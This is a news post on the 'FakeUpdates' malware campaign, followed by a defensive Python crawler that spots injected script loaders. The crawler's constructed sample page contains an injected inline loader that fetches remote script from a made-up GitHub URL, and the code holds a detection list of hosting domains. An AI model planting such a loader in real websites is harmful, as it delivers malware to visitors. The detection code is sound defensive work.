'FakeUpdates' Campaign Leverages Multiple Website Platforms

Malwarebytes Labs has written a very in-depth article on its blog about a malware campaign it is calling “FakeUpdates.” The campaign compromises websites running several different content management systems and injects malicious code that tells visitors a program on their computer is out of date, then starts a download of a malicious file.

Even more nefarious is the fact that these attacks host the malicious files on legitimate file hosting services such as GitHub and Dropbox, so the download URLs point at domains most users and many URL filters already trust. The article goes deep into the details of how the script is injected on the various platforms; a simple crawler written by Malwarebytes found several hundred compromised WordPress and Joomla websites. Thanks to @cageymaru for the story.

This campaign relies on a delivery mechanism that leverages social engineering and abuses a legitimate file hosting service. The ‘bait’ file consists of a script rather than a malicious executable, giving the attackers the flexibility to develop interesting obfuscation and fingerprinting techniques.
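The kind of crawler pass the article mentions, as an added example that is neither Malwarebytes' code nor part of the original post: given a fetched page's HTML and the site's own hostname, it lists script tags that load from file-hosting domains and inline scripts that reference such hosts, which is the shape of the injected loader described above. The list of hosting domains and the sample page are constructed assumptions for this example, not indicators published with the campaign.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts an injected loader might pull the bait script from. These are
# assumptions for this example (the article names the services only as
# GitHub and Dropbox), not indicators published with the campaign.
HOSTING_DOMAINS = (
    "dropbox.com",
    "dropboxusercontent.com",
    "github.com",
    "githubusercontent.com",
)

URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


class ScriptCollector(HTMLParser):
    """Collect <script src=...> URLs and the bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.srcs = []       # src attribute values, in document order
        self.inline = []     # text of inline <script> blocks
        self._in_inline = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.srcs.append(src)
        else:
            self._in_inline = True

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_inline = False

    def handle_data(self, data):
        if self._in_inline:
            self.inline.append(data)


def is_hosting_domain(host):
    """True for a hosting domain or any subdomain of one (not look-alikes)."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in HOSTING_DOMAINS)


def scan_page(html, page_host):
    """Return (kind, detail) findings: 'external' for a script src pointing
    at a hosting domain, 'inline' for a hosting host referenced by URL
    inside an inline script (a loader that builds the tag at runtime)."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.srcs:
        host = urlparse(src).hostname or ""   # '' for relative paths
        if host and host != page_host and is_hosting_domain(host):
            findings.append(("external", src))
    for body in parser.inline:
        for host in URL_HOST_RE.findall(body):
            if is_hosting_domain(host):
                findings.append(("inline", host))
    return findings


# Constructed sample: a blog-style page with its own legitimate scripts,
# one injected external <script> and one injected inline loader.
# Not a real capture; the URLs are made up for the example.
SAMPLE_HTML = """<!DOCTYPE html>
<html><head><title>Constructed blog page</title>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script src="https://example-blog.test/wp-content/themes/demo/main.js"></script>
</head><body>
<p>Welcome to the constructed blog.</p>
<script src="https://dl.dropboxusercontent.com/s/constructed/update.js"></script>
<script>
var s = document.createElement('script');
s.src = 'https://raw.githubusercontent.com/constructed/repo/main/upd.js';
document.head.appendChild(s);
</script>
</body></html>
"""

if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_HTML, "example-blog.test"):
        print(kind, detail)
```

A real crawler would fetch each page (and, ideally, the scripts it references, since the injected loader is often a second stage) before calling scan_page; this block works on HTML already in hand so it runs offline. Subdomain matching is deliberate: the bait files the article describes are served from the hosting services' content subdomains, and a plain substring match would also flag look-alike domains.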


Source: [H]ardOCP – ‘FakeUpdates’ Campaign Leverages Multiple Website Platforms